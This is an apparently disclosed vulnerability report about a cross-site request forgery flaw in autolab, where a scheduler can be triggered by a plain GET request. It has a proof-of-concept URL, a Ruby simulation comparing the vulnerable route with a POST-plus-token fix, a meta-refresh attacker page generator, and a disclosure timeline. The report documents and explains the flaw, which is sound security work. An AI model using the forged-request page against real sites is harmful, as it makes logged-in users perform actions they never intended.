Cross-Site Request Forgery when running a scheduler via GET in autolab/autolab

Valid

Reported on

May 11th 2022


Description

There is a CSRF vulnerability in autolab's scheduler feature: the action that runs a scheduler is exposed over a GET route (routes.rb), so a logged-in user who merely visits the URL triggers it. Because it is a GET, Rails' forgery protection does not apply to it, and the browser attaches the user's session cookie to the request even when the navigation was initiated from an attacker-controlled page.

Proof of Concept

  1. Install a local instance of autolab.
  2. Log in, go to /courses/<course-name>/schedulers and create a schedule.
  3. Open the link /courses/<course-name>/schedulers/<scheduler-id>/run in the browser. This is a plain GET, so it can just as well be a link or redirect on a third-party page; observe that the scheduler is run.
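The following is an added example, not autolab's code and not the code of the fix commit: a toy Ruby model of the reported route beside a hardened version (POST only, checked against a per-session authenticity token, which is how Rails' protect_from_forgery treats non-GET requests), together with the page an attacker would host. The ToyApp class, the simulate helper, the host autolab.example, the course 15-213 and scheduler id 7 are constructed for the example; only the path shape follows the PoC above.

```ruby
# Added example (not autolab's code): a toy model of the vulnerable GET route and
# of a hardened POST+token version, plus the page an attacker would host.
# Host, course name, scheduler id and the ToyApp/simulate names are assumptions.
require 'securerandom'

class ToyApp
  SessionData = Struct.new(:user, :csrf_token)
  RUN_ROUTE = %r{\A/courses/(?<course>[^/]+)/schedulers/(?<id>\d+)/run\z}

  attr_reader :run_log

  # require_post_with_token: false models the reported behaviour (a GET runs the
  # scheduler); true models a fix (POST only, with a per-session authenticity token).
  def initialize(require_post_with_token:)
    @require_post_with_token = require_post_with_token
    @sessions = {}
    @run_log = []
  end

  # Log in and return the cookie the browser will now attach to every request to
  # this origin, regardless of which site initiated the request.
  def login(user)
    cookie = SecureRandom.hex(16)
    @sessions[cookie] = SessionData.new(user, SecureRandom.hex(16))
    cookie
  end

  # The token is embedded in the app's own pages; an attacker's origin cannot read
  # it (same-origin policy), which is what makes the POST+token version safe.
  def csrf_token_for(cookie)
    @sessions.fetch(cookie).csrf_token
  end

  # Dispatch one request and return [status, message].
  def request(method, path, cookie:, params: {})
    session = @sessions[cookie]
    return [302, 'redirect to login'] unless session

    m = RUN_ROUTE.match(path)
    return [404, 'not found'] unless m

    if @require_post_with_token
      return [404, 'not found'] unless method == 'POST'
      return [422, 'invalid authenticity token'] unless params['authenticity_token'] == session.csrf_token
    else
      return [404, 'not found'] unless method == 'GET'
    end

    @run_log << { course: m[:course], scheduler: Integer(m[:id]), by: session.user }
    [200, 'scheduler running']
  end
end

# The attacker's page: a top-level navigation (meta refresh) to the run URL. A
# top-level GET carries the victim's cookie even under the SameSite=Lax default,
# so nothing beyond visiting the attacker's page is needed.
def forgery_page(target_url)
  %(<html><head><meta http-equiv="refresh" content="0;url=#{target_url}"></head><body></body></html>)
end

# Simulate: the victim logs in, then visits the attacker's page; the browser
# follows the navigation and attaches the victim's session cookie.
def simulate(require_post_with_token:)
  app = ToyApp.new(require_post_with_token: require_post_with_token)
  victim = app.login('alice')
  path = '/courses/15-213/schedulers/7/run' # constructed course and scheduler id

  page = forgery_page("https://autolab.example#{path}")
  target = page[/url=([^"]+)/, 1].sub('https://autolab.example', '')

  # What the browser does when it renders the attacker's page.
  forged_get = app.request('GET', target, cookie: victim)
  # With GET closed off, the attacker can still auto-submit a cross-site form,
  # but cannot supply a token it never saw.
  forged_post = app.request('POST', target, cookie: victim, params: { 'authenticity_token' => 'guess' })
  # The legitimate submission from the app's own page, carrying the real token.
  legit_post = app.request('POST', target, cookie: victim,
                           params: { 'authenticity_token' => app.csrf_token_for(victim) })

  { forged_get: forged_get[0], forged_post: forged_post[0], legit_post: legit_post[0],
    runs_triggered: app.run_log.size }
end

if __FILE__ == $PROGRAM_NAME
  p simulate(require_post_with_token: false) # vulnerable: the forged GET runs the scheduler
  p simulate(require_post_with_token: true)  # fixed: only the legitimate POST succeeds
end
```

In the vulnerable configuration the forged GET returns 200 and one run is recorded; in the hardened one the forged GET is not a route at all, the forged POST fails the token check with 422, and only the request carrying the token from the app's own page succeeds. Note the SameSite caveat: the Lax default that modern browsers apply to cookies does not help against a state-changing GET, because cookies are still sent on top-level navigations, so moving the action to POST (and letting the framework's forgery check apply) is the actual fix, not relying on cookie attributes.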

Impact

An attacker who lures a logged-in autolab user to a crafted link can make that user's browser run a scheduler of the attacker's choosing, without the user's intent or knowledge.

Occurrences

routes.rb#L75 has been validated

Timeline

We are processing your report and will contact the autolab team within 24 hours. (a year ago)
We have contacted a member of the autolab team and are waiting to hear back. (a year ago)
Joey Wildman validated this vulnerability. (a year ago)

We have verified this issue and are working on a fix.

justinp09010 has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
Damian Ho marked this as fixed in 2.8.0 with commit af5eb6. (a year ago)
Damian Ho has been awarded the fix bounty.
This vulnerability will not receive a CVE.